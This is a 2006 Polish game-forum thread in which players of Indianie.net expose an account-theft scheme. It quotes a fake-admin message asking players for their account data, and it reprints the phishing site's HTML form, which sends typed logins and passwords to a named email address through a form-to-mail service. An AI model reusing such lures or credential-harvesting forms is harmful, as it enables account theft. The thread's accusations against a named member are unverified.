INDIANIE.net Strona G³ówna INDIANIE.net
Oficjalne forum

FAQFAQ  SzukajSzukaj  U¿ytkownicyU¿ytkownicy  GrupyGrupy  StatystykiStatystyki
RejestracjaRejestracja  ZalogujZaloguj

Poprzedni temat «» Nastêpny temat
Kradzierze kont
Autor Wiadomo¶æ
Borszczu 
Siurak The Great

Nick w grze: Borszczu
PlemiÄ™: INKOWIE
Do³±czy³: 08 Wrz 2006
Sk±d: Kielce
Wys³any: 2006-09-10, 22:37   Kradzierze kont

Azarel napisał:
ZAPRASZAM NA STRONE WWW.INDIANIE.XT.PL wersja testowa INDIANIE! ale to przyszła nowa wersja

operator napisał:
W związku z licznymi podszywaniami sie pod adminó gry Indianie.net uprzejmie prosimy o podanie danych konta w celach czysto technicznych oraz w celu ustalenia zgodności z bazą danych. z góry ziękujemyza współpracę. Pozdrawiam i czekam na odpowiedź.

Wiele osob sie na to nabiera i traci konta a wszystko przez to ze zmiana hasła jest zbyt prosta. SiVo ja proponuje zrobic to na takiej zasadzie jak w the crims! Tam gdy chcesz zmienic hasło musisz potriedzic ta zmiane kodem który Ci przysyłaja na maila. I uwarzam ze to w pełni rozwiazało by ten problem...

I jeszcze raz Cie prosze o zmiane minimalnego czasu siedzenia w tipi na 20 min, bo osoby bez wodza sobie nie bardzo moga pograc.

moczyk
[Usuniêty]

Wys³any: 2006-09-10, 23:45   

jestem za wszystkim co napisałes:P

SiVo 
Administrator
Wódz nad wodze :)

Nick w grze: sivo
PlemiÄ™: Apache
Do³±czy³: 29 Sie 2006
Sk±d: WrocÅ‚aw
Wys³any: 2006-09-11, 15:23   

ok :) obiecuje, że coś zrobie w tej sprawie :)

Azarel
[Usuniêty]

Wys³any: 2006-09-11, 17:23   

Ehhh już wam mówiłem KSG napisał mi żebym zareklamował wersje testową no to to zrobiłem i nawet z kodu źródłowego widać że to ksg nie prawdziliście? czy nie umiecie nawet a z tym tipi to naprawde przesada :/

ksg666
[Usuniêty]

Wys³any: 2006-09-11, 19:14   

Co?? Mówiłem że już konto sprzedałem! Nie gram nim! Nie wiem co sie dzieje! Jak śmiesz mnie oskarzac??

moczyk
[Usuniêty]

Wys³any: 2006-09-14, 23:42   

sprzedales zbanowane konto? albo ten kole do kupil dostal bana

Navka1
[Usuniêty]

Wys³any: 2006-09-15, 13:01   

oo... jak KSG sprzedal konto to juz wiem kto to...

Mistrz_Baldura
[Usuniêty]

Wys³any: 2006-09-15, 16:11   

Ludzie http://indianie.xt.pl to tam kradną konta nie logujcie sie tam :!: :!: :!: SiVo ja ci to pisałem na privie czytałeś :?: :?: :?: :?:

SiVo 
Administrator
Wódz nad wodze :)

Nick w grze: sivo
PlemiÄ™: Apache
Do³±czy³: 29 Sie 2006
Sk±d: WrocÅ‚aw
Wys³any: 2006-09-15, 21:05   

tak, wiem... zrobiłem nawet cenzure na poczcie i na placu tego adresu ;) (wiadomo, obejść sie da, ale zawsze to coś ;))

Satanael
[Usuniêty]

Wys³any: 2006-09-24, 10:28   

<form method="post" action="http://free4web.pl/Form2Mail">
<input name="email" value="ksg666@o2.pl" type="hidden">
tak wyglada kod tej strony (indianie.xt.pl) ... wszedlem na stronie do ktorej wysylane sa dane z formularza i znalazlem tam taki opis uslugi wykozystywanej przez ta strone

"Form2Mail to narzędzie służące do wysyłania formularzy na podany adres e-mail. Jeżeli masz na swojej stronie jakiś formularz i chcesz by wprowadzone do niego dane były wysyłane na Twoje konto e-mail, to ten komponent jest dla Ciebie!"

login i haslo wysylane byly na ksg666@o2.pl... to ze Ksg666 nie ma konta wcale nie oznacza ze to nie on kradl je innym, nawed jakby oddal swoje komus to i tak dane z temtego formularza dochodzily do niego na skrzynke

Szegi
[Usuniêty]

Wys³any: 2006-09-24, 11:54   

co wy mnie tak pozdrawiacie co?? SiVo to już dawno , dzieki Moczyk za pozdro i nawzajem

elymus
[Usuniêty]

Wys³any: 2006-09-24, 12:08   

:lol: [you:c45acc3493] co siÄ™ patrysz?

[ Dodano: 2006-09-24, 12:09 ]
P.S. http://rzep.pl/topics10/85.htm#538

Ukryty_Samuraj
[Usuniêty]

Wys³any: 2006-09-24, 12:12   

hej, Satanael (dobrze4 napisalem?) odkrylem to jeszcze w cvzasie klotni ktora wybuchla n czacie i wyslalem do SiVo. Wystarczy podpatrzec kod zrodlowy :D

Wy¶wietl posty z ostatnich:   
Odpowiedz do tematu
Nie mo¿esz pisaæ nowych tematów
Nie mo¿esz odpowiadaæ w tematach
Nie mo¿esz zmieniaæ swoich postów
Nie mo¿esz usuwaæ swoich postów
Nie mo¿esz g³osowaæ w ankietach
Dodaj temat do Ulubionych
Wersja do druku

Skocz do: